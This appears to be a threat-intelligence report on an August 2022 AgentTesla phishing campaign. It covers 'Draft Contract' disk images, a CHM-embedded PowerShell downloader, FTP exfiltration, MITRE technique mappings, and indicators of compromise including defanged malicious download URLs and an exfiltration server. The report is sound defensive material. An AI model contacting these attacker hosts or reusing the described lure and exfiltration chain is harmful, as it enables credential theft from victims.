A phishing campaign spreading the AgentTesla information stealer targets businesses worldwide by sending spoofed emails with malicious disk images (.IMG/.ISO) named “Draft Contract”; the attack harvests browser and email credentials and other system data. A PowerShell downloader inside an obfuscated CHM file downloads the final payload and exfiltrates data to an attacker-controlled FTP server. #AgentTesla #DraftContract #PowerShell #FTPServer #CHM
Keypoints
- The campaign uses spoofed emails to deliver a disk image containing a CHM with obfuscated JavaScript that triggers the next stage of infection.
- The attachment’s subject and name (“Draft Contract”) vary by recipient language, and the email body is minimal, sometimes including a line that says “Get Outlook for Android.”
- A PowerShell downloader is launched from the obfuscated script to fetch the final payload.
- The final payload is AgentTesla spyware capable of stealing passwords, taking screenshots, collecting system information, and downloading more malware.
- The campaign affected multiple regions in waves (Spain, Portugal, Romania, South America, Germany, Argentina, Switzerland) between August 12–23, 2022, with thousands of users protected in each wave.
- IoCs include SHA256 hashes for the ISO attachment and AgentTesla components, plus several exfiltration and download servers.
<liCredentials and victim data are exfiltrated to an FTP server, with credentials sent in plain text and hourly downloads from the server.
MITRE Techniques
- [T1566.001] Phishing – The campaign uses emails that are spoofed and the subject of the email and the attachment are named “Draft Contract” in various languages depending on who the email is sent to. The emails are bare, with the exception of a line of text that says ‘Get Outlook for Android’.
- [T1027] Obfuscated/Compressed Files and Information – The attached file contains an obfuscated JavaScript part that triggers the download stage.
- [T1059.001] PowerShell – The JavaScript launches the PowerShell command shown below. This command downloads the final payload.
- [T1036] Masquerading – The final payload is downloaded from a seemingly legitimate site and is disguised as a request for a JPG image; AgentTesla is disguised as an injected code in the InstallUtil.exe executable file.
- [T1041] Exfiltration – Credentials stored in browsers and other apps are sent to an FTP server under the attacker’s control; data about the victim’s computer is also exfiltrated.
- [T1113] Screen Capture – AgentTesla capabilities include taking screenshots.
- [T1055] Process Injection – AgentTesla is disguised as an injected code in the InstallUtil.exe executable file.
- [T1082] System Information Discovery – The malware collects basic data about the computer and OS details (user name, computer name, OS, CPU, RAM).
- [T1105] Ingress Tool Transfer – The PowerShell downloader fetches the final payload from a remote site.
Indicators of Compromise
- [SHA256] Hashes – ISO Attachment: 83fe51953a0fe44389e197244faf90afe8ee80101dc33cb294cf6ef710e5aaba; AgentTesla Downloader Script: 76f707afa3d4b2678aa5af270ea9325de6f8fdc4badf7249418e785438f1b8da; AgentTesla Injector: eb455ffb1595d1a06fc850ebc49b270ae84dd609e7b52144a60bb45cf4c4eb0e
- [Domain] FTP Exfiltration Server – ftp.akmokykla[.]lt
- [URL] AgentTesla Download Servers – assltextile[.]com/Su34M.jpg, consult-mob[.]ro/M777.jpg, handcosalon[.]com/Su57.jpg